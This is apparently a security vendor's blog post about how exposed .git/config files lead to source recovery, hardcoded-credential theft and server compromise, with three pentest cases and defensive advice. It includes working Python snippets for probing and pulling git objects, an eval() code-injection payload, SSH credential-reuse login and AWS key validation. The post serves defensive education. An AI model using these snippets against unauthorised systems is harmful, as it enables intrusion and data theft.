When Automation Isn’t Enough: The True Impact of Human Expertise on Your Perimeter
With new CVEs and emerging threats making headlines daily, it’s easy to lose sight of less public risks that may be critical to your business. Most of those newsworthy vulnerabilities won’t affect your business, yet they often distract security teams from doing their due diligence on other issues affecting the attack surface. Just because a vulnerability isn’t glamorous enough to hit the headlines doesn’t mean it doesn’t pose a serious risk to your business.
As we’ve worked alongside clients with our Continuous Attack Surface Testing (CAST) offering, we’ve seen many issues that initially seem minor but, upon further investigation, present a major risk. Scanners miss these issues because they require real human analysis to determine how an attacker could use them to pivot deeper into your networks.
Scanners are often pointed at targets, pounding them with every CVE under the sun, yet they miss certain files lying around on web servers, such as .git/config files. The presence of such a file exposed online is not a vulnerability in and of itself, but it can be an indicator that additional exposures exist and a sign to a human pen tester or red teamer to dig for related issues. Regardless of the methodology used to identify these files, it is important to treat such exposures as potential high-impact leads and to immediately mobilize human experts to conduct a thorough analysis.
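As an illustration, checking for this exposure is straightforward. Below is a minimal sketch (not CAST’s actual engine) that probes a target for an exposed .git/config using Python’s requests library; the target URL is a placeholder.

```python
import requests

def check_git_exposure(base_url: str) -> bool:
    """Probe a web server for an exposed .git/config file."""
    url = f"{base_url.rstrip('/')}/.git/config"
    try:
        resp = requests.get(url, timeout=10)
    except requests.RequestException:
        return False
    # A real .git/config starts with an INI-style [core] section;
    # checking for it filters out catch-all 200 responses.
    return resp.status_code == 200 and "[core]" in resp.text

if __name__ == "__main__":
    # Placeholder target; substitute a host you are authorized to test.
    if check_git_exposure("https://example.com"):
        print("Exposed .git/config found -- a lead worth human follow-up.")
```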
LOW-LEVEL ISSUES MIGHT NOT BE AS HARMLESS AS THEY SEEM
CAST’s scanning engine is trained to seek out most of the potentially sensitive file types that can be found on web servers. Even if the scanner doesn’t generate a lead, our Operators still do a sanity check and look for these file types. A .git/config file found on a server is a strong indicator that a git repository exists on that server. From here, the Operator begins the process of rebuilding the repository index and recovering as many files as possible. A recovered repository might only be partial, but in most cases even a few recovered files surface valuable leads for the Operator to investigate further. Once recovery is complete, Operators focus on analyzing the repo’s contents. Typically, the two most severe findings within those contents are as follows:
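To make the recovery step concrete, here is a simplified sketch of how a single loose git object can be retrieved and decompressed over HTTP. Real recovery tooling also parses .git/index, refs, and packfiles to enumerate objects and rebuild the full file tree; this sketch shows only the core fetch-and-inflate step, with a placeholder URL and object hash.

```python
import zlib
import requests

def fetch_git_object(base_url: str, sha: str) -> bytes:
    """Download and inflate one loose object from an exposed .git directory."""
    # Loose objects live at .git/objects/<first 2 hash chars>/<remaining chars>.
    url = f"{base_url.rstrip('/')}/.git/objects/{sha[:2]}/{sha[2:]}"
    resp = requests.get(url, timeout=10)
    resp.raise_for_status()
    # Objects are zlib-compressed: a "<type> <size>\x00" header, then content.
    raw = zlib.decompress(resp.content)
    header, _, body = raw.partition(b"\x00")
    print(f"Recovered object: {header.decode()}")
    return body

# Usage with a hypothetical object hash (hashes come from parsing the
# recovered index and refs, not from guessing):
# body = fetch_git_object("https://example.com", "<40-char object hash>")
```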
- Vulnerabilities in the code itself, revealed by source-to-sink analysis. This can lead the Operator to a path to remote code execution in the codebase, one of the most severe threats to an organization’s security. If an attacker succeeds in reaching this point, the results can be devastating.
- Hardcoded credentials left inside the codebase, which can be easily recovered and used against the target in different ways. Most commonly, these are database credentials or AWS keys, which would allow an attacker full or partial access to your data or AWS instances (a minimal detection sketch follows this list).
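As a simple illustration of that second point, the sketch below sweeps recovered files for hardcoded AWS access key IDs; the regex matches the well-known AKIA key-ID format. This is a toy under stated assumptions, not how CAST Operators actually work, and the directory path is a placeholder.

```python
import re
from pathlib import Path

# AWS access key IDs follow a well-known format: "AKIA" + 16 characters.
AWS_KEY_RE = re.compile(r"\bAKIA[0-9A-Z]{16}\b")

def scan_for_aws_keys(repo_dir: str) -> list[tuple[str, str]]:
    """Sweep every file in a recovered repository for AWS key IDs."""
    hits = []
    for path in Path(repo_dir).rglob("*"):
        if not path.is_file():
            continue
        text = path.read_text(errors="ignore")
        for match in AWS_KEY_RE.findall(text):
            hits.append((str(path), match))
    return hits

# Usage against a hypothetical recovered repo directory:
# for filename, key_id in scan_for_aws_keys("./recovered-repo"):
#     print(f"{filename}: possible AWS key {key_id}")
```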
HOW HUMAN EXPERTISE HAS FOUND SEEMINGLY LOW-RISK ISSUES THAT PRESENT BIG RISKS
The following use cases are real-world examples of risks that a scanner might flag but would never explore; human expertise was required to understand the related issues an attacker could exploit.
Use Case #1: A CAST Operator discovered a git repository containing a custom-written PHP application and found that the developer was using PHP’s eval() function. Once the Operator figured out a way to pass a crafted payload to eval(), he was able to get shell access on the box and recover additional data from the server.
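The application in this case was PHP, but the flaw class translates directly to other languages. The following hypothetical Python handler shows the same dangerous pattern, where attacker-controlled input reaches eval():

```python
# A hypothetical vulnerable handler (the real finding was in PHP, but the
# pattern is identical): user input flows, unvalidated, into eval().
def calculate(user_expression: str):
    # Intended for input like "2 + 2", but nothing enforces that.
    return eval(user_expression)

# An attacker can supply an expression that executes arbitrary code instead:
payload = "__import__('os').popen('id').read()"
print(calculate(payload))  # runs the `id` shell command on the server
```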
Impact: When shell access is acquired on a system, an attacker can elevate privileges and gain root access on the host. This can lead to additional data loss, such as full access to a local database. In other cases, attackers may choose to pivot to other systems on the network to expand their foothold.
Use Case #2: After recovering a partial repository, a CAST Operator located a configuration file with database credentials for the application. A quick review of the open ports on the host revealed that no database service was listening externally, so at first glance the recovered credentials seemed of limited use. However, the Operator intuitively decided to try the database credentials to establish an SSH connection to the target. He was not only granted access, but was able to elevate to root-level access on the box because the user was included in the sudoers file with full access.
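Testing for that kind of credential reuse takes only a few lines. Here is a minimal sketch using the paramiko SSH library; the host and credentials are placeholders, not details from the engagement.

```python
import paramiko

def try_ssh_reuse(host: str, username: str, password: str) -> bool:
    """Attempt an SSH login with credentials recovered from a config file."""
    client = paramiko.SSHClient()
    # Accept unknown host keys for a one-off authorized test.
    client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
    try:
        client.connect(host, username=username, password=password, timeout=10)
        return True
    except paramiko.AuthenticationException:
        return False
    finally:
        client.close()

# Placeholder values; only run against systems you are authorized to test.
# if try_ssh_reuse("203.0.113.10", "appuser", "recovered-db-password"):
#     print("Database credentials are reused for SSH -- critical finding.")
```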
Impact: With this root-level access, the Operator demonstrated how an attacker could recover the database’s encryption keys and decrypt the personally identifiable information of the nearly 3 million users stored in that database.
Use Case #3: Partial repository recovery once again led an Operator to uncover AWS keys in a config file. Using an open source AWS post-exploitation tool, the Operator was able to gain remote code execution on the organization’s domain controller. At this point, the Operator exfiltrated and cracked numerous password hashes from the domain controller, recovering plaintext passwords for many of the network’s users.
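The write-up doesn’t name the tool involved, but the first step with any recovered AWS key is typically to confirm it is live and identify the principal it belongs to. A minimal sketch with boto3 (the credentials are placeholders):

```python
import boto3

def whoami(access_key: str, secret_key: str) -> dict:
    """Confirm a recovered AWS key is live and identify its principal."""
    sts = boto3.client(
        "sts",
        aws_access_key_id=access_key,
        aws_secret_access_key=secret_key,
    )
    # GetCallerIdentity requires no permissions, so it works for any valid key.
    return sts.get_caller_identity()

# Placeholder credentials recovered from a config file:
# identity = whoami("AKIAXXXXXXXXXXXXXXXX", "recovered-secret-key")
# print(identity["Arn"])  # reveals the account ID and the key's IAM principal
```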
Impact: The Operator could log into users’ corporate accounts, lock them out of those accounts, and read confidential communications, such as email or instant messages and chats.
As these three use cases show, the damage that a simple .git/config exposure can cause is extraordinary, and far greater than is immediately apparent.
HOW CAN YOU PLAY DEFENSE AGAINST THESE TYPES OF ATTACKS?
After reading the above, you are probably concerned about the level of risk your business faces from these low-level issues. Below are some tried-and-true defensive security measures organizations can use to prevent this level of damage to their attack surface.
- Discourage credential reuse. This is one of the most common mistakes in organizations; employees are bound to reuse credentials at one point or another. It’s critical that your employees use unique passwords for each service and environment.
- Disallow directory listing and block access to hidden paths on web servers. Disabling directory listing makes discovery harder, but attackers can still request well-known paths like .git/config directly, so deny access to those directories outright.
- Avoid hard-coded credentials in code. Sensitive data such as credentials or encryption keys should be stored in a secrets manager or injected at runtime, never committed to the repository (see the sketch after this list).
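As a concrete example of that last point, the sketch below contrasts a hardcoded credential with one pulled from the environment at runtime; the variable names are illustrative.

```python
import os

# Risky: anyone who recovers this file (e.g., from an exposed .git
# directory) gets working credentials.
# DB_PASSWORD = "s3cr3t-hardcoded-password"

# Safer: the code ships without the secret; it is injected at runtime via
# the environment or fetched from a dedicated secrets manager. Indexing
# (rather than .get()) fails fast if the variable was never set.
DB_PASSWORD = os.environ["DB_PASSWORD"]

def connect_to_database():
    # Illustrative placeholder; a real app would hand DB_PASSWORD to its
    # database driver here.
    print("Password is", "set" if DB_PASSWORD else "missing")
```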
While these issues might not be the glamorous vulnerabilities you’ll see in the headlines, they can cause just as much damage as, if not more than, the emerging threats trending on Twitter. These issues tend to be more widespread across companies, and attackers know how to exploit them with open source tools. Shore up your security defenses today and train your teams on the best practices and proper configurations that can minimize your organization’s risk of such issues.
If you want to chat with our team about how our CAST solution can help, we’re happy to give you a demo and answer any questions.